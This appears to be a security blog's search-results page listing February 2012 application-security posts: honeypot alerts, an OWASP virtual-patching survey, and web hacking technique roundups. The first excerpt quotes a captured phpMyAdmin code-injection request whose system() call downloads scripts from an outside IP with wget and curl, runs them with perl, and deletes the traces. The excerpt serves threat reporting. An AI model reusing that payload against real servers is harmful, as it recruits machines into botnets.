Showing 6 results for: February 2012 ×Application Security ×

[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment

Our web honeypots picked up the following attacks today: 62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7...

Call for Assistance: OWASP Virtual Patching Survey

Identification of web application vulnerabilities is only half the battle with remediation efforts as the other. In an ideal world, application defects could be quickly fixed within the application's code and pushed out into production rapidly. Let's face the facts,...

Top Ten Web Protection Techniques of 2011

Top Ten Web Hacking Techniques of 2011 Every year the web security community votes on the top web hacking techniques for the past year. The techniques identified are normally innovative, scary and sometimes down right funny and they serve an...

WASC Distributed Web Honeypots Project Update

As the WASC Distributed Web Honeypots Project Sponsor, we are excited to announce that we have officially launched the next phase of the project! If you would like to participate, please read below. Project Overview The goal of the Distributed...

[Honeypot Alert] Status Report for January 2012

Monthly Web Honeypot Status Report We have received a tremendous amount of positive feedback on our web-based honeypot alert blog posts. While we agree that this data is useful for raising awareness of individual attack details, we feel that what...